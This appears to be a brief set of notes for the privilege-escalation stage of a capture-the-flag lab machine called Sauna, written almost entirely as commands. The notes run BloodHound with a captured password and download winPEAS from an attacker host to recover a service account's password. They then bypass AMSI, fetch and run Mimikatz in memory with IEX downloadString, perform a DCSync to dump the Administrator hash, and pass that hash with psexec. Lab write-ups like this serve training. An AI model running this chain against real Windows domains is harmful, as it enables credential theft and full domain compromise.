Priv Esc

sudo bloodhound-python -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' -ns 10.10.10.175 -c all
SVC_LOANMGR
*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/winPEAS.exe -o winPEAS.exe
*Evil-WinRM* PS C:\programdata> ls


    Directory: C:\programdata


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-        1/22/2020   9:30 PM                Microsoft
d-----        7/13/2021  10:53 AM                Package Cache
d-----        5/28/2024   4:43 PM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----        1/22/2020   9:33 PM                USOPrivate
d-----        1/22/2020   9:33 PM                USOShared
d-----        7/13/2021  10:54 AM                VMware
-a----        5/28/2024   5:24 PM        2387456 winPEAS.exe


*Evil-WinRM* PS C:\programdata> .\winPEAS.exe
svc_loanmgr:Moneymakestheworldgoround!
$ netexec winrm sauna -u svc_loanmgr -p 'Moneymakestheworldgoround!'
$ evil-winrm -i sauna -u svc_loanmgr -p 'Moneymakestheworldgoround!' -s ~/opt/wpe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Bypass-4MSI
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Mimikatz.ps1')
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator"'
impacket-psexec administrator@sauna -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e'
